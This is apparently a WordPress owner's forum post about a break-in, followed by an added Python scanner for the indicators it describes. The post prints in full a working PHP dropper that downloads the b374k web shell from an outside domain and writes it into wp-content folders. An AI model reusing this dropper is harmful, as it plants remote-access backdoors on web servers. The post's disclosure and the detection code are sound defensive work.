Wordfence free Found
Looks like someone may have gotten into my site… These are what Wordfence found: (I think this was mentioned in your emails)
Edited index.php file inside wp-content:
<?php
$sh_path = crtf();
echo "|".$sh_path ."|";
$exepf = php_self();
function crtf() {
    $shpath = $_SERVER['DOCUMENT_ROOT']."/wp-content/languages/mo.php";
    $shf = FFGet("https://st.famousjewelry.top/mo.txt");
    if($shf=="") { return -1; }
    $result = file_put_contents($shpath, $shf);
    if($result) { return "/wp-content/languages/mo.php"; }
    $shpath = $_SERVER['DOCUMENT_ROOT']."/wp-content/plugins/dz-seo";
    if(!file_exists($shpath)) mkdir($shpath);
    $shpath = $shpath."/mo.php";
    $result = file_put_contents($shpath, $shf);
    if($result) { return "/wp-content/plugins/dz-seo/mo.php"; }
    $shpath = dirname(__FILE__)."/mo.php";
    $result = file_put_contents($shpath, $shf);
    return substr($_SERVER["REQUEST_URI"],0,strrpos($_SERVER['REQUEST_URI'],'/'))."/mo.php";
}
function php_self(){
    $php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);
    return $php_self;
}
function FFGet( $url ){
    $file_contents ='';
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    if(function_exists('file_get_contents')){
        ini_set('user_agent',$user_agent);
        try { $file_contents = @file_get_contents( $url ); } catch (Exception $e) { }
    }
    if(strlen($file_contents)<1&&function_exists('curl_init')){
        try {
            $file_contents ="";
            $ch = curl_init();
            $timeout = 30;
            curl_setopt($ch,CURLOPT_URL,$url);
            curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
            curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
            curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
            curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
            curl_setopt($ch,CURLOPT_USERAGENT,$user_agent);
            $file_contents = curl_exec( $ch);
            curl_close( $ch );
        } catch (Exception $e) {}
    }
    return $file_contents;
}
?>
And inspecting this file I manually removed the folder dz-seo which had a file called mo.php which was a rather long file with this comment:
b374k 2.8
Jayalah Indonesiaku
(c)2013
https://code.google.com/p/b374k-shell
I did not see the languages folder mentioned in the file but I feel like I need to check any language folder I find.
The domain comes back with:
Domain Name: famousjewelry.top
Domain ID: D20160908G10001G_79830266-TOP
WHOIS Server: whois.paycenter.com.cn
Referral URL: https://www.xinnet.com
Updated Date: 2017-01-09T18:01:53Z
Creation Date: 2016-09-08T05:51:58Z
Registry Expiry Date: 2017-09-08T05:51:58Z
Sponsoring Registrar: XinNet Technology Corporation
Sponsoring Registrar IANA ID: 120
Domain Status: ok https://www.icann.org/epp#OK
Registrant ID: n7ynce8fx8m9b0
Registrant Name: linli
Registrant Organization: linli
Registrant Street: Beijing
Registrant City: shixiaqu
Registrant State/Province: beijingshi
Registrant Postal Code: 100000
Registrant Country: CN
Registrant Phone: +86.01099305610
Registrant Phone Ext:
Registrant Fax: +86.01099305610
Registrant Fax Ext:
Registrant Email: [email protected]
Admin ID: 7kr8w18009e063
Admin Name: linli
Admin Organization: linli
Admin Street: Beijing
Admin City: shixiaqu
Admin State/Province: beijingshi
Admin Postal Code: 100000
Admin Country: CN
Admin Phone: +86.01099305610
Admin Phone Ext:
Admin Fax: +86.01099305610
Admin Fax Ext:
Admin Email: [email protected]
Tech ID: 7kr8w18009e063
Tech Name: linli
Tech Organization: linli
Tech Street: Beijing
Tech City: shixiaqu
Tech State/Province: beijingshi
Tech Postal Code: 100000
Tech Country: CN
Tech Phone: +86.01099305610
Tech Phone Ext:
Tech Fax: +86.01099305610
Tech Fax Ext:
Tech Email: [email protected]
Name Server: ns18.xincache.com
Name Server: ns17.xincache.com
Thanks for the Wordfence plugin
If you want the files you can get them here.
Just wanted to let you and whoever else know…
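A check for the artifacts described in this post, as an added example that is not part of the original post or of Wordfence. The paths, domain and `b374k` marker come from the post; the function name `scan`, the size limit and the heuristic that a stock `wp-content/index.php` defines no functions are assumptions of this example.

```python
import os

# Indicators taken from the post; the scanning approach is this example's own.
DROP_PATHS = ("wp-content/languages/mo.php", "wp-content/plugins/dz-seo/mo.php")
MARKERS = (b"famousjewelry.top", b"b374k")


def scan(doc_root, max_bytes=2_000_000):
    """Return a sorted list of (relative_path, reason) findings under doc_root."""
    findings = set()
    # The two fixed locations the dropper tries first.
    for rel in DROP_PATHS:
        if os.path.isfile(os.path.join(doc_root, rel)):
            findings.add((rel, "known drop path"))
    content = os.path.join(doc_root, "wp-content")
    for dirpath, _dirs, files in os.walk(content):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, doc_root).replace(os.sep, "/")
            try:
                with open(full, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                findings.add((rel, "unreadable"))
                continue
            for marker in MARKERS:
                if marker in data:
                    findings.add((rel, "contains " + marker.decode()))
            # Last fallback in the dropper: mo.php written beside the edited index.php.
            if name == "mo.php" and "index.php" in files:
                findings.add((rel, "mo.php beside index.php"))
            # Stock wp-content/index.php is a comment-only stub, so code there is suspect.
            if dirpath == content and name == "index.php" and b"function" in data:
                findings.add((rel, "index.php defines functions"))
    return sorted(findings)
```

Run it against the site's document root; a hit is a reason to compare the file with a clean WordPress copy, not proof of compromise by itself.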